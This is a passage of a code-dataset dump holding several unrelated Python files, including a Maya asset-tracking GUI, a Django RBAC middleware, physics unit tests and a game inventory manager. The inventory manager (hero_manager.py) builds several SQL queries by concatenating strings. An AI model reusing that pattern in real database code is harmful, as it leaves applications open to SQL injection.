self.tb.addAction(self.sortByExtension)\n self.tb.addAction(self.sortByStatus)\n \n AddSeparator()\n self.tb.addAction(self.highLightByObj)\n self.tb.addAction(self.highLightByMat)\n self.tb.addAction(self.highLightByTex)\n AddSeparator()\n 
self.tb.addAction(self.highLightByKeyWord)\n AddSeparator()\n self.tb.addAction(self.selectGeometry)\n self.tb.addAction(self.selectMaterial) \n \n AddSeparator()\n self.tb.addAction(self.refresh)\n \n self.tb.setContextMenuPolicy(Qt.ActionsContextMenu) \n \n \n #----------------------------------------------------------------------\n def CreateMainToolBar(self):\n \"\"\"build toolBar\"\"\"\n toolBar = self.addToolBar(\"main\")\n \n toolBar.addAction(self.refresh)\n toolBar.addSeparator()\n toolBar.addAction(self.setPath)\n toolBar.addAction(self.browse)\n toolBar.addAction(self.rename)\n toolBar.addSeparator()\n toolBar.addAction(self.copyTo)\n toolBar.addAction(self.moveTo)\n toolBar.addSeparator()\n toolBar.addAction(self.view)\n toolBar.addAction(self.reveal)\n \n #sortToolBar = self.addToolBar(\"sort\")\n toolBar.addSeparator()\n toolBar.addSeparator()\n toolBar.addAction(self.sortA2Z)\n toolBar.addAction(self.sortZ2A)\n toolBar.addAction(self.sortByExtension)\n toolBar.addAction(self.sortByStatus)\n toolBar.addSeparator()\n toolBar.addAction(self.highLightByKeyWord)\n \n selToolBar = self.addToolBar(\"select\")\n selToolBar.addAction(self.highLightByObj)\n selToolBar.addAction(self.highLightByMat)\n selToolBar.addAction(self.highLightByTex)\n selToolBar.addSeparator()\n selToolBar.addAction(self.selectGeometry)\n selToolBar.addAction(self.selectMaterial)\n \n \n #----------------------------------------------------------------------\n def CollectFileData(self):\n \"\"\"Get all fileTextureName\"\"\"\n self.Files = ['c:/avatar.jpg', 'c:/sampledNormals.jpg']\n #self.Files = mc.ls(type='file')\n #self.FileNames = [mc.getAttr('%s.fileTextureName'%f) for f in self.Files]\n #self.FileDict = dict(zip(self.Files, self.FileNames))\n \n #----------------------------------------------------------------------\n def CreateTable(self):\n \"\"\"build table\"\"\"\n \n header = [\"Name\", \"Full Path\", \"Status\", \"Type\", \"File Node\", \"\"]\n \n self.tb = QTableWidget(1000,len(header))\n self.tb.setHorizontalHeaderLabels(header)\n #self.tb.verticalHeader().setVisible(False)\n self.tb.setEditTriggers(QTableWidget.NoEditTriggers)\n self.tb.setSelectionBehavior(QTableWidget.SelectRows)\n \n self.tb.setColumnWidth(0, 200) #Name\n self.tb.setColumnWidth(1, 700) #Full Path\n self.tb.setColumnWidth(2, 50) #Status\n self.tb.setColumnWidth(3, 50) #Type::Extension Name\n self.tb.setColumnWidth(len(header)-1, 1000) #theLast\n \n self.setCentralWidget(self.tb)\n #print(self.tb.rowHeight(0))\n #print(self.tb.columnWidth(0))\n \n for i in range(self.tb.rowCount()):\n self.tb.setRowHeight(i, 20)\n \n if self.Files:\n print(self.Files)\n myTable = MyTable.CreateFromFileNames(self.Files)\n print(myTable)\n for t in myTable:\n print(t)\n \n if self.Files:\n for r in range(len(self.Files)):\n fPath, fName = os.path.split(self.Files[r])\n fType = os.path.splitext(self.Files[r])[-1]\n for c in range(self.tb.columnCount()-1):\n if c == 0: #Name\n self.tb.setItem(r, c, QTableWidgetItem(fName))\n elif c == 1: #Full Path\n self.tb.setItem(r, c, QTableWidgetItem(fPath))\n elif c == 2: #Status\n _status = QTableWidgetItem(\"OK\" if os.path.exists(self.Files[r]) else \"Missing\")\n _status.setTextAlignment(0x0044)\n self.tb.setItem(r, c, _status)\n elif c == 3: #Type\n _type = QTableWidgetItem(fType)\n _type.setTextAlignment(0x0044)\n self.tb.setItem(r, c, _type) \n \n #self.Data = {\"fileA.tga\":[\"c:/fileA/\", True, \".tga\"]}\n #if self.Data:\n #keys = self.Data.keys()\n #values = self.Data.values()\n ##print(values)\n 
#for r in range(len(self.Data)):\n #for c in range((self.tb.columnCount()-1)):\n ##self.tb.setItem(r, c, QTableWidgetItem((\"%s,%s\"%(data.keys()[r],c))))\n #if c == 0: #Name\n #self.tb.setItem(r, c, QTableWidgetItem(keys[r]))\n #elif c == 1: #Full Path\n #self.tb.setItem(r, c, QTableWidgetItem(values[r][0]))\n #elif c == 2: #Status\n #item = QTableWidgetItem(\"OK\" if values[r][1] else \"Missing\")\n #item.setTextAlignment(0x0044)\n #self.tb.setItem(r, c, item)\n #elif c == 3: #Type\n #item = QTableWidgetItem(os.path.splitext(keys[r])[-1])\n #item.setTextAlignment(0x0044)\n #self.tb.setItem(r, c, item)\n \n #---------------------------------------------------------------------- \n def resizeEvent(self, e):\n pass\n \"\"\"\n changed = e.size() - e.oldSize()\n fullPathColWidth = self.tb.columnWidth(1)\n print(changed.width(), fullPathColWidth)\n if changed.width() > 0 and self.width() > 1000 and fullPathColWidth < self.width():\n self.tb.setColumnWidth(1, (fullPathColWidth + changed.width()))\n elif self.width() < 1000:\n self.tb.setColumnWidth(1, 700)\n \"\"\"\n\n\n \"\"\"\"\"\"\"\"\"\"\"\"\n #Methods:\n \"\"\"\"\"\"\"\"\"\"\"\"\n #----------------------------------------------------------------------\n def SetPath(self):\n \"\"\"set fileNode path\"\"\"\n print('setPath')\n \n if self.tb.selectedItems():\n rows = []\n for i in self.tb.selectionModel().selectedRows():\n rows.append(i.row())\n fd = unicode(QFileDialog.getExistingDirectory())\n print(fd)\n if fd and rows:\n for r in rows:\n self.tb.item(r,1).setText(fd)\n newPath = os.path.join(fd, unicode(self.tb.item(r,0).text()))\n _status = \"OK\" if os.path.exists(newPath) else \"Missing\"\n self.tb.item(r,2).setText(_status)\n #update maya connections\n \n #----------------------------------------------------------------------\n def Browse(self):\n \"\"\"browse image file\"\"\"\n print('browse image file')\n \n #self.tb.selectRow(5)\n rows = []\n for i in self.tb.selectionModel().selectedRows():\n rows.append(i.row())\n print(rows)\n \n #----------------------------------------------------------------------\n def Rename(self):\n \"\"\"rename image file\"\"\"\n print('rename image file')\n \n #----------------------------------------------------------------------\n def CopyTo(self):\n \"\"\"copy image file to...\"\"\"\n print('copy image file to...')\n \n #----------------------------------------------------------------------\n def MoveTo(self):\n \"\"\"move image file to...\"\"\"\n print('move image file to...')\n \n #----------------------------------------------------------------------\n def View(self):\n \"\"\"view image\"\"\"\n print('view image')\n \n #----------------------------------------------------------------------\n def Reveal(self):\n \"\"\"reveal image in explorer\"\"\"\n print('reveal image in explorer')\n\n #----------------------------------------------------------------------\n def Refresh(self):\n \"\"\"refresh file node information\"\"\"\n print('refresh')\n\n #\n #----------------------------------------------------------------------\n def SortA2Z(self):\n \"\"\"sort by A to Z\"\"\"\n print('sort by A to Z')\n \n #----------------------------------------------------------------------\n def SortZ2A(self):\n \"\"\"sort by Z to A\"\"\"\n print('sort by Z to A')\n\n #----------------------------------------------------------------------\n def SortByExtension(self):\n \"\"\"sort by file extension\"\"\"\n print('sort by file extension')\n \n #----------------------------------------------------------------------\n def 
SortByStatus(self):\n \"\"\"sort by file status\"\"\"\n print('sort by file status')\n\n #\n #----------------------------------------------------------------------\n def HighLightByObj(self):\n \"\"\"highLight image file by selected obj(geometry)\"\"\"\n print('highLight image file by selected obj(geometry)')\n\n #----------------------------------------------------------------------\n def HighLightByMat(self):\n \"\"\"highLight image file by selected material\"\"\"\n print('highLight image file by selected material')\n \n #----------------------------------------------------------------------\n def HighLightByTex(self):\n \"\"\"highLight image file by selected texture(fileNode)\"\"\"\n print('highLight image file by selected texture(fileNode)')\n \n #----------------------------------------------------------------------\n def HighLightByKeyWord(self):\n \"\"\"highLight image file by keyword (user input)\"\"\"\n print('highLight image file by keyword (user input)')\n \n #\n #----------------------------------------------------------------------\n def SelectGeometry(self):\n \"\"\"select relevant geometry\"\"\"\n print('select relevant geometry')\n\n #----------------------------------------------------------------------\n def SelectMaterial(self):\n \"\"\"select relevant material(s)\"\"\"\n print('select relevant material(s)')\n \n\n\n########################################################################\nclass Row(object):\n \"\"\"the row data\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self, fileName=None):\n \"\"\"Constructor:: Row('c:/textures/bitmap.tga')\"\"\"\n \n fPath, fName = os.path.split(fileName)\n \n self._name = fName\n self._fullPath = fPath\n self._status = \"OK\" if os.path.exists(fileName) else \"Missing\"\n self._type = os.path.splitext(fileName)[-1]\n \n #----------------------------------------------------------------------\n def _getName(self):\n \"\"\"\"\"\"\n return self._name\n #----------------------------------------------------------------------\n def _setName(self, v):\n \"\"\"\"\"\"\n if isinstance(v, str) or isinstance(v, unicode) or isinstance(v, QString):\n self._name = v\n \n Name = property(_getName, _setName)\n \n #----------------------------------------------------------------------\n def _getFullPath(self):\n \"\"\"\"\"\"\n return self._fullPath\n #----------------------------------------------------------------------\n def _setFullPath(self, v):\n \"\"\"\"\"\"\n if os.path.isdir(v):\n self._fullPath = v\n \n FullPath = property(_getFullPath, _setFullPath)\n \n #----------------------------------------------------------------------\n def _getStatus(self):\n \"\"\"\"\"\"\n return self._status\n \n Status = property(_getStatus)\n \n #----------------------------------------------------------------------\n def _getType(self):\n \"\"\"\"\"\"\n return self._type\n \n Type = property(_getType)\n \n #----------------------------------------------------------------------\n def __str__(self):\n \"\"\"\"\"\"\n return u\"name:%s path:%s status:%s type:%s\"%(self.Name, self.FullPath, self.Status, self.Type)\n \n\n\n########################################################################\nclass MyTable(object):\n \"\"\"\n MyRow Collection:: [ [key1, Row1], [key2, Row2] ... 
]\n    Similar to collections.OrderedDict, but implemented by hand for Python 2.7\n    \n    \"\"\"\n    #----------------------------------------------------------------------\n    def __init__(self):\n        \"\"\"Constructor\"\"\"\n        self._table = []\n        self._start = 0\n\n    #----------------------------------------------------------------------\n    @staticmethod\n    def CreateFromFileNames(fileNames=[]):\n        \"\"\"Factory Method:: Create a sorted table\"\"\"\n        tb = MyTable()\n        \n        fileNames.sort()\n        for f in fileNames:\n            tb.Add(f, Row(f))\n            #if os.path.isfile(f):\n                #tb.Add(f, Row(f))\n        \n        return tb\n    \n    #----------------------------------------------------------------------\n    def _getTable(self):\n        \"\"\"\"\"\"\n        return self._table\n    \n    #----------------------------------------------------------------------\n    def _setTable(self, v):\n        \"\"\"\"\"\"\n        if isinstance(v, list):\n            self._table = v\n    \n    Table = property(_getTable, _setTable)\n    \n    #----------------------------------------------------------------------\n    def _getKeys(self):\n        \"\"\"fileName collection\"\"\"\n        keys = []\n        for item in self.Table:\n            keys.append(item[0])\n        return keys\n    \n    Keys = property(_getKeys)\n    \n    #----------------------------------------------------------------------\n    def _getValues(self):\n        \"\"\"MyRow collection\"\"\"\n        values = []\n        for item in self.Table:\n            values.append(item[1])\n        return values\n    \n    Values = property(_getValues)\n    \n    #----------------------------------------------------------------------\n    def _getCount(self):\n        \"\"\"\"\"\"\n        return len(self.Table)\n    \n    Count = property(_getCount)\n    \n    #----------------------------------------------------------------------\n    def __len__(self):\n        \"\"\"\"\"\"\n        return self.Count\n    \n    #----------------------------------------------------------------------\n    def Add(self, k, v):\n        \"\"\"append [k, v] in the Table collection, k is the UniqueFileName(ex: 'c:/textures/bitmap.tga'), v is a MyRow object\"\"\"\n        if isinstance(v, Row):\n            self.Table.append([k, v])\n        else:\n            raise TypeError(\"argument v must be of type Row\")\n    \n    #----------------------------------------------------------------------\n    def Clear(self):\n        \"\"\"reset the table; Keys and Values are read-only views derived from Table\"\"\"\n        self.Table = []\n        self._start = 0\n    \n    #----------------------------------------------------------------------\n    def Remove(self, k):\n        \"\"\"[].pop\"\"\"\n        if self.Keys.count(k):\n            index = self.Keys.index(k)\n            self.Table.pop(index)\n    \n    #----------------------------------------------------------------------\n    def __getitem__(self, k):\n        \"\"\"\"\"\"\n        if isinstance(k, int):\n            #raise KeyError(\"%s\"%k)\n            return self[self.Keys[k]]\n        # 'and' binds tighter than 'or', so the type checks must be parenthesized\n        if (isinstance(k, str) or isinstance(k, unicode) or isinstance(k, QString)) and self.Keys.count(k):\n            return self.Table[self.Keys.index(k)][-1]\n    #----------------------------------------------------------------------\n    def __setitem__(self, k, v):\n        \"\"\"\"\"\"\n        if (isinstance(k, str) or isinstance(k, unicode) or isinstance(k, QString)) and isinstance(v, Row):\n            if self.Keys.count(k):\n                index = self.Keys.index(k)\n                self.Table[index][-1] = v\n            else:\n                self.Add(k, v)\n    \n    #----------------------------------------------------------------------\n    def SortByName(self, reverse=False):\n        \"\"\"sort by name(A-Z), reverse=True:(Z-A)\"\"\"\n        if self.Count > 0:\n            self.Table.sort(key=lambda item:item[-1].Name, reverse=reverse)\n    \n    #----------------------------------------------------------------------\n    def SortByType(self, reverse=False):\n        \"\"\"\"\"\"\n        if self.Count > 0:\n            self.Table.sort(key=lambda item:item[-1].Type, reverse=reverse)\n    \n    
#----------------------------------------------------------------------\n def SortByStatus(self, reverse=False):\n \"\"\"\"\"\"\n if self.Count > 0:\n self.Table.sort(key=lambda item:item[-1].Status, reverse=reverse)\n \n #----------------------------------------------------------------------\n def __str__(self):\n \"\"\"\"\"\"\n return unicode([\"\\n['%s': %s]\\n\"%(k,self[k]) for k in self.Keys])\n \n #----------------------------------------------------------------------\n def __iter__(self):\n \"\"\"\"\"\"\n return self\n \n #----------------------------------------------------------------------\n def next(self):\n \"\"\"\"\"\"\n if self._start >= self.Count:\n raise StopIteration\n index = self._start\n self._start += 1\n return self.Table[index]\n \n #----------------------------------------------------------------------\n def Reset(self):\n \"\"\"\"\"\"\n self._start = 0\n \n \n \n#----------------------------------------------------------------------\ndef Main():\n \"\"\"test\"\"\"\n app = QApplication(sys.argv)\n #win = AssetTracking(GetMayaWindow())\n \n win = AssetTracking()\n win.show()\n \n sys.exit(app.exec_())\n \nif __name__ == \"__main__\":\n Main()\n\n","sub_path":"PySideExercise/AssetTracking.py","file_name":"AssetTracking.py","file_ext":"py","file_size_in_byte":25546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"573391696","text":"import numpy as np\nfrom os.path import join\nfrom tensorboardX import SummaryWriter\nfrom matplotlib import pyplot as plt\nfrom io import BytesIO\nfrom PIL import Image\nfrom functools import partial\nfrom functools import wraps\nimport time\n\ndef write_until_success(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n for i in range(30):\n try:\n ret = func(*args, **kwargs)\n break\n except OSError:\n print('%s OSError' % str(args))\n time.sleep(1)\n return ret\n return wrapper\n\nclass Visualizer():\n def __init__(self, opt):\n self.opt = opt\n if opt.isTrain:\n self.name = opt.name\n self.save_dir = join(opt.checkpoints_dir, opt.name, 'log')\n self.writer = SummaryWriter(logdir=join(self.save_dir))\n else:\n self.name = '%s_%s_%d' % (\n opt.name, opt.dataset_name, opt.load_iter)\n self.save_dir = join(opt.checkpoints_dir, opt.name)\n if opt.save_imgs:\n self.writer = SummaryWriter(logdir=join(\n self.save_dir, 'ckpts', self.name))\n\n @write_until_success\n def display_current_results(self, phase, visuals, iters):\n for k, v in visuals.items():\n v = v.cpu()\n self.writer.add_image('%s/%s'%(phase, k), v[0]/255, iters)\n self.writer.flush()\n\n @write_until_success\n def print_current_losses(self, epoch, iters, losses,\n t_comp, t_data, total_iters):\n message = '(epoch: %d, iters: %d, time: %.3f, data: %.3f) ' \\\n % (epoch, iters, t_comp, t_data)\n for k, v in losses.items():\n message += '%s: %.4e ' % (k, v)\n self.writer.add_scalar('loss/%s'%k, v, total_iters)\n print(message)\n \n @write_until_success\n def print_psnr(self, epoch, total_epoch, time_val, mean_psnr):\n self.writer.add_scalar('val/psnr', mean_psnr, epoch)\n print('End of epoch %d / %d (Val) \\t Time Taken: %.3f s \\t PSNR: %f'\n % (epoch, total_epoch, time_val, mean_psnr))\n\n\n","sub_path":"util/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"405549930","text":"import json\n\nfrom django.contrib.sites.models import Site\nfrom django.core.serializers.json import DjangoJSONEncoder\n\nfrom ...core.utils import build_absolute_uri\n\n\ndef get_organization():\n site = Site.objects.get_current()\n return {'@type': 'Organization', 'name': site.name}\n\n\ndef get_skill_data(line, organization):\n gross_skill_price = line.get_total().gross\n skill_data = {\n '@type': 'Offer',\n 'itemOffered': {\n '@type': 'Skill',\n 'name': line.translated_skill_name or line.skill_name,\n 'sku': line.skill_sku,\n },\n 'price': gross_skill_price.amount,\n 'priceCurrency': gross_skill_price.currency,\n 'eligibleQuantity': {\n '@type': 'QuantitativeValue',\n 'value': line.quantity\n },\n 'seller': organization}\n\n skill = line.variant.skill\n skill_url = build_absolute_uri(skill.get_absolute_url())\n skill_data['itemOffered']['url'] = skill_url\n\n skill_image = skill.get_first_image()\n if skill_image:\n image = skill_image.image\n skill_data['itemOffered']['image'] = build_absolute_uri(\n location=image.url)\n return skill_data\n\n\ndef get_task_confirmation_markup(task):\n \"\"\"Generates schema.org markup for task confirmation e-mail message.\"\"\"\n organization = get_organization()\n task_url = build_absolute_uri(task.get_absolute_url())\n data = {\n '@context': 'http://schema.org',\n '@type': 'Task',\n 'merchant': organization,\n 'taskNumber': task.pk,\n 'priceCurrency': task.total.gross.currency,\n 'price': task.total.gross.amount,\n 'acceptedOffer': [],\n 'url': task_url,\n 'potentialAction': {\n '@type': 'ViewAction',\n 'url': task_url\n },\n 'taskStatus': 'http://schema.org/TaskProcessing',\n 'taskDate': task.created}\n\n lines = task.lines.prefetch_related('variant')\n for line in lines:\n skill_data = get_skill_data(line=line, organization=organization)\n data['acceptedOffer'].append(skill_data)\n return json.dumps(data, cls=DjangoJSONEncoder)\n","sub_path":"remote_works/seo/schema/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"174680671","text":"import user_manager\r\nimport mysql_helper\r\nimport random\r\nfrom equipment import equipmentClass\r\n\r\n\r\ndef randomize_equipment_id():\r\n # print(\"Randomized equipment ran!\")\r\n randomized_number = random.randint(0, 101)\r\n\r\n \"\"\"\r\n * Common: 1 - 50\r\n * Rare: 50 - 80\r\n * Epic: 80 - 95\r\n * Legendary: 95 - 100 \r\n \"\"\"\r\n if randomized_number < 50:\r\n return \"Common\"\r\n elif 49 < randomized_number < 80:\r\n return \"Rare\"\r\n elif 79 < randomized_number < 95:\r\n return \"Epic\"\r\n else:\r\n return \"Legendary\"\r\n\r\n\r\n\"\"\"\r\nAuthor: Felix Wang\r\nPurpose: Returns a randomized Equipment\r\nReturns: If method is successful: Equipment_Obj\r\n If method is unsuccessful: False\r\nParameters: rarity : string (E.g 'Common')\r\n\"\"\"\r\ndef randomize_equipment_by_rarity(rarity):\r\n sql_statement = \"SELECT * FROM myequipment WHERE equipmentRarity = '\" + rarity + \"'\"\r\n equipment_list = mysql_helper.select_statement(sql_statement)\r\n equipment_obj_list = []\r\n\r\n for eq in equipment_list:\r\n print(eq)\r\n equipment_obj = equipmentClass(eq[0], eq[1], eq[2], eq[3], eq[4], eq[5], eq[6], 'N')\r\n equipment_obj_list.append(equipment_obj)\r\n\r\n if len(equipment_obj_list) == 0:\r\n print (\"ERROR: Equipment with '%s' rarity does not exist \" % rarity)\r\n return False\r\n else:\r\n randomized_number = random.randint(0, len(equipment_obj_list) - 1)\r\n print (\"SUCCESS: Returned equipment object with %s rarity.\" % rarity)\r\n return equipment_obj_list[randomized_number]\r\n\r\n\r\ndef get_existing_equipment(User_id):\r\n sql_statement = \"SELECT * FROM myheroinventory hi INNER JOIN myequipment eq \" \\\r\n \"ON hi.equipmentId = eq.equipmentId WHERE hi.userId = '\" + User_id + \"'\"\r\n response = mysql_helper.select_statement(sql_statement)\r\n if not response:\r\n return [1]\r\n equipment_list = response\r\n print(\"%s results returned \" % (str(len(equipment_list))))\r\n\r\n equipment_obj_list = []\r\n try:\r\n for eq in equipment_list:\r\n equipment_obj = equipmentClass(eq[3], eq[4], eq[5], eq[6], eq[7], eq[8], eq[9], eq[2])\r\n equipment_obj_list.append(equipment_obj)\r\n except IndexError:\r\n return []\r\n return [0, equipment_obj_list]\r\n\r\n\r\ndef equip_equipment(userID, equipmentID):\r\n sql_statement = \"UPDATE myheroinventory SET isEquipped = 'Y' WHERE userId = %s AND equipmentId = %s\"\r\n print(userID, equipmentID)\r\n print(sql_statement)\r\n if not mysql_helper.sql_operation(sql_statement, [str(userID), str(equipmentID)]):\r\n return 1\r\n else:\r\n return 0\r\n\r\n\r\ndef unequip_equipment(userID, equipmentID):\r\n sql_statement = \"UPDATE myheroinventory SET isEquipped = 'N' WHERE userId = %s AND equipmentId = %s\"\r\n if not mysql_helper.sql_operation(sql_statement, [str(userID), str(equipmentID)]):\r\n return 1\r\n else:\r\n return 0\r\n\r\n\r\n\"\"\"\r\nAuthor: Felix Wang\r\nPurpose: Adds equipment to the selected user\r\nReturns: Message\r\nParameters: User id : int\r\n\"\"\"\r\n\r\n\r\ndef obtain_equipment(User_id, Equipment_id):\r\n sql_statement = \"SELECT * FROM myheroinventory WHERE userId = '\" + str(User_id) + \"' AND equipmentId = '\" + str(Equipment_id) + \"';\"\r\n\r\n # If equipment already exist. 
Exit the method\r\n if mysql_helper.check_if_record_exist(sql_statement):\r\n print(\"Item already exist\")\r\n return \"Success\"\r\n\r\n # Save the equipment into the database\r\n sql_statement = \"INSERT INTO myheroinventory (userId, equipmentId, isEquipped) VALUES (%s, %s, %s)\"\r\n data_value = [User_id, Equipment_id, 'N']\r\n response = mysql_helper.sql_operation(sql_statement, data_value)\r\n if not response:\r\n print(response)\r\n return response\r\n print(\"Equipment Obtained Sucesssfully\")\r\n return \"Success\"\r\n\r\n\r\ndef update_total_power(userID):\r\n sql_statement = \"SELECT SUM(e.equipmentPowerLevel) FROM myheroinventory hi INNER JOIN myequipment e \" \\\r\n \"ON hi.equipmentID = e.equipmentID WHERE userId = '\" + str(userID) + \"' AND isEquipped = 'Y'\"\r\n\r\n response = mysql_helper.select_statement(sql_statement)\r\n if not response:\r\n return [1]\r\n print(response[0][0])\r\n if response[0][0] is None:\r\n return [0, 0]\r\n else:\r\n return [0, response[0][0]]\r\n\r\n\r\nif __name__ == '__main__':\r\n # user_obj = user_manager.getUserObj(1)\r\n # user_obj.print_details()\r\n # obtain_equipment(user_obj.Id, '1')\r\n # equipment_obj_list = get_existing_equipment(user_obj.Id)\r\n # for eq in equipment_obj_list:\r\n # eq.print_details()\r\n equipment_obj = randomize_equipment_by_rarity('commoner')\r\n equipment_obj.print_details()\r\n","sub_path":"server/hero_manager.py","file_name":"hero_manager.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"423383161","text":"\"\"\"\r\r\nTest that the graphics card responds to the \r\r\npygame setgamma command\"\"\"\r\r\n\r\r\nfrom psychopy import *\r\r\n\r\r\nmyWin = Window((800.0,800.0),fullscr=1)\r\r\nmyWin.setGamma(1.0)\r\r\n\r\r\ngammaValDisplay = TextStim(myWin,pos=[-0.9,-0.9],rgb=(1.0,1.0,1.0))\r\r\n\r\r\ntrialClock = Clock()\r\r\nt=0.0\r\r\n\r\r\nwhile t<10:\r\r\n t = trialClock.getTime()\r\r\n \r\r\n gammaVal = t/3.0 +1\r\r\n gammaValDisplay.set('text',str(gammaVal))\r\r\n gammaValDisplay.draw()\r\r\n myWin.setGamma(gammaVal)\r\r\n myWin.update()\r\r\n \r\r\nmyWin.close()","sub_path":"sandbox/testGammaTable.pyw","file_name":"testGammaTable.pyw","file_ext":"pyw","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"362001294","text":"sum = 18\r\nnumbers = [3,5,10]\r\n\r\ntempList = [0]*(sum+1)\r\ntempList[0] = 1\r\ntemp = 0\r\nfor i in numbers:\r\n for j in range(i,sum+1):\r\n if j%i==0 or tempList[j-i] >0:\r\n tempList[j]+=1\r\n #print(i,j,tempList)\r\nprint(max(tempList))\r\n","sub_path":"Codes/waysToGetSum.py","file_name":"waysToGetSum.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"322061345","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n####\n# Frank and Raha\n# Elementary module for CW 5\n# PHYS 220\n# 10/1/18\n####\n\nimport elementary\nfrom scipy import constants\nimport math\n\n\"\"\"elementary.py Test Module\n\nVerifies that the implementations for the particle classes are correct.\n\"\"\"\n\ndef test_instantiation():\n \"\"\"Verify that particles are created with correct attributes.\n \"\"\"\n p = elementary.Particle(1.0, 2.0, 3.0)\n assert math.isclose(p.mass, 1.0)\n assert all(math.isclose(*pos) for pos in zip(p.position, (1.0, 2.0, 3.0)) )\n assert all(math.isclose(*mom) for mom in zip(p.momentum, (0.0, 0.0, 0.0)) )\n\ndef test_impulse():\n \"\"\"Verify that an impulse changes the momentum.\n \"\"\"\n p = elementary.Particle(1.0, 2.0, 3.0)\n p.impulse(1.0, 2.0, 3.0)\n assert all(math.isclose(*mom) for mom in zip(p.momentum, (1.0, 2.0, 3.0)) )\n \ndef test_move():\n \"\"\"Verify that motion proceeds as expected.\n \"\"\"\n p = elementary.Particle(1.0, 2.0, 3.0)\n p.mass = 2.0 # Change mass so motion is nontrivial\n p.impulse(1.0, 2.0, 3.0)\n p.move(0.1)\n assert all(math.isclose(*pos) for pos in zip(p.position, (1.0 + 0.1*1.0/2.0, 2.0 + 0.1*2.0/2.0, 3.0 + 0.1*3.0/2.0)) )\n\ndef test_electron():\n \"\"\"Verify the electron implementation.\n \"\"\"\n e = elementary.Electron(1.0, 2.0, 3.0)\n assert math.isclose(e.mass, constants.m_e)\n assert math.isclose(e.charge, -constants.e)\n\ndef test_proton():\n \"\"\"Verify the positron implementation.\n \"\"\"\n p = elementary.Proton(1.0, 2.0, 3.0)\n assert math.isclose(p.mass, constants.m_p)\n assert math.isclose(p.charge, constants.e)\n","sub_path":"test_particles.py","file_name":"test_particles.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"360859163","text":"from django.conf import settings\r\nfrom django.utils.deprecation import MiddlewareMixin\r\nimport re\r\nfrom django.shortcuts import HttpResponse, redirect\r\n\r\n\r\nclass RbacMiddleware(MiddlewareMixin):\r\n \"\"\"\r\n 用户权限信息校验\r\n \"\"\"\r\n\r\n def process_request(self, request):\r\n \"\"\"\r\n 当用户请求刚进入时候出发执行\r\n :param request:\r\n :return:\r\n \"\"\"\r\n\r\n \"\"\"\r\n 1. 获取当前用户请求的URL\r\n 2. 获取当前用户在session中保存的权限列表 ['/customer/list/','/customer/list/(?P\\\\d+)/']\r\n 3. 权限信息匹配\r\n \"\"\"\r\n current_url = request.path_info\r\n for valid_url in settings.VALID_URL_LIST:\r\n if re.match(valid_url, current_url):\r\n # 白名单中的URL无需权限验证即可访问\r\n return None\r\n\r\n permission_list = request.session.get(settings.PERMISSION_SESSION_KEY)\r\n\r\n if not permission_list:\r\n # return redirect('/login/')\r\n return HttpResponse('未获取到用户权限信息,请登录!')\r\n\r\n flag = False\r\n\r\n for url in permission_list:\r\n reg = \"^%s$\" % url\r\n if re.match(reg, current_url):\r\n flag = True\r\n break\r\n\r\n if not flag:\r\n return HttpResponse('无权访问')\r\n","sub_path":"rbac/middlewares/rbac.py","file_name":"rbac.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"531015166","text":"#!/usr/bin/env python\n\n'''\n p5At\n written by George Wilborn\n @01362321\n'''\n\n#import regular expression module\nimport re\n'''\nsetVariable\n will take in the rest of the line and set variables into the dictionary\n atString - string containing tokens\n varDictionary - Dictionary for the variables\n'''\ndef setVariable(atString,varDictionary):\n #split line into tokens with regular expressions\n# print(atString)\n tokens = re.split(\"[\\\"=\\\\n]*\",atString)\n# print(tokens)\n\n #insert var into dictionary\n varDictionary[tokens[0]] = tokens[1]\n\n'''\nsetFormat\n will take in rest of the line and set the format vars into the dictionary\n atString - line pulled from file\n formatDictionary - dictionary for the format vars\n'''\ndef setFormat(atString,formatDictionary):\n #list of specifics to look for later on\n buttons = \"LEFT RIGHT BULLET CENTER\"\n\n #seperate line into tokens\n tokens = re.split(\"[=\\s\\\\n]*\",atString)\n\n #conditional statements\n for i in range(0,(len(tokens)-1),2):\n #all the good stuff insert into dictionary\n if(tokens[i] in formatDictionary):\n if(tokens[i]==\"JUST\"):\n if(re.compile(tokens[i+1]).search(buttons)):\n formatDictionary[tokens[i]] = tokens[i+1]\n #all the bad stuffs (yell at user)\n else:\n print(\"*** Bad value for JUST=, found:\", tokens[i+1])\n else:\n formatDictionary[tokens[i]] = tokens[i+1]\n else:\n print(\"*** Invalid format, found:\", atString)\n","sub_path":"python/p6/p6At.py","file_name":"p6At.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
